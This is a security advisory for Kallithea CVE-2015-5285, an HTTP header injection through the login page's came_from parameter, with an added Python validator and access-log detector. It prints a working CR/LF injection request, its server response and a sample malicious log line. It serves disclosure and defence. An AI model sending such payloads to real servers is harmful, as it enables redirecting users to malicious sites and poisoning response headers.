Kallithea Security Notice CVE-2015-5285

HTTP header injection


A vulnerability has been found in Kallithea, allowing attackers to inject arbitrary headers into the server response for certain URLs.


HTTP header injection was possible in login-related code of Kallithea, allowing attackers to inject arbitrary headers into the server responses.

The vulnerability is in the handling of the came_from GET parameter of the login page: its value is copied into the Location header of the redirect response without filtering CR/LF characters, so a URL-encoded CR LF sequence (%0d%0a) in the parameter starts a new header line in the response.

Example of a malicious request:

GET /_admin/login?came_from=1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
Content-Length: 0
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438

Corresponding response:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 411
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Sep 2015 13:58:05 GMT
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
Pragma: no-cache
Server: waitress

  <title>302 Found</title>
  <h1>302 Found</h1>
  The resource was found at <a href="
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk ">
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk </a>;
you should be redirected automatically.



The bug allows an attacker to override important response headers, possibly redirecting users to a malicious website or making other middleware misbehave when it trusts the response headers.
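The following Python example is added here and is not part of the Kallithea advisory or of the project's code. It shows the two things a defender wants for this class of bug: a check that only accepts a came_from redirect target when it is a same-site relative path containing no control characters (so CR/LF can never reach the Location header), and a scan of web-server access-log lines for came_from values that decode to control characters, which is the pattern of the request shown above. The function names, the access-log regex and the sample log lines are constructed assumptions, not Kallithea's code or real logs.

```python
"""Validation and log detection for CR/LF injection via a redirect parameter.

Added example; the helpers, log format and sample lines are constructed and
are not part of Kallithea.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Control characters must never appear in a header value.  The advisory's
# request used %0d%0a (CR LF) plus %01%02 to break out of the Location header.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def safe_came_from(value, default="/"):
    """Return a redirect target that is safe to place in a Location header.

    The value is accepted only if it is a relative path on this site.  Anything
    else falls back to `default`:
      * control characters      -> header injection (this advisory)
      * absolute or //host URLs -> open redirect to a foreign site
      * backslashes             -> some browsers treat '/\\host' as '//host'
    """
    if not value:
        return default
    # Check the raw value first: urlsplit() strips some control characters
    # itself, which would hide the injection attempt from the checks below.
    if CONTROL_CHARS.search(value):
        return default
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        return default
    if not value.startswith("/") or value.startswith("//") or "\\" in value:
        return default
    return value


# Combined access-log format (constructed assumption about the log layout).
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3})'
)


def find_header_injection_attempts(log_lines, param="came_from"):
    """Return (client_ip, decoded_value) for every log line whose `param`
    query value decodes to a string containing a control character."""
    hits = []
    for line in log_lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("path")).query
        # parse_qsl percent-decodes values, so %0d%0a becomes "\r\n" here.
        for key, val in parse_qsl(query, keep_blank_values=True):
            if key == param and CONTROL_CHARS.search(val):
                hits.append((m.group("ip"), val))
    return hits


# Constructed sample log lines: one benign login redirect, one injection attempt
# following the shape of the request in the advisory (example.invalid host).
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Sep/2015:13:58:05 +0000] '
    '"GET /_admin/login?came_from=/repo/summary HTTP/1.1" 302 411',
    '10.0.0.9 - - [21/Sep/2015:13:58:07 +0000] '
    '"GET /_admin/login?came_from=1%0d%0aLocation%3a%20http://example.invalid'
    ' HTTP/1.1" 302 411',
]

if __name__ == "__main__":
    for raw in ["/repo/summary", "1\r\nLocation: http://example.invalid",
                "//example.invalid/x", "http://example.invalid/"]:
        print(repr(raw), "->", repr(safe_came_from(raw)))
    for ip, val in find_header_injection_attempts(SAMPLE_LOG):
        print("injection attempt from", ip, ":", repr(val))
```

The validation rejects before urlsplit() runs on purpose: recent Python versions strip some C0 control characters inside urlsplit(), so checking the parsed result alone could pass a value that still carries CR/LF. Rejecting absolute and scheme-relative URLs at the same point also closes the open-redirect variant that a came_from parameter typically invites.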


The Kallithea project has fixed this issue in the stable branch. Users are advised to upgrade to the latest 0.3 release.

Affected versions

The issue is present in Kallithea versions before 0.3.


Thanks to Gjoko Krstic of Zero Science Lab for reporting this issue.


  1. CVE-2015-5285 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285

  2. Kallithea: Security Notice CVE-2015-5285 https://kallithea-scm.org/security/cve-2015-5285.html

  3. Mercurial changeset fixing the issue https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068

  4. Zero Science Lab http://www.zeroscience.mk/en/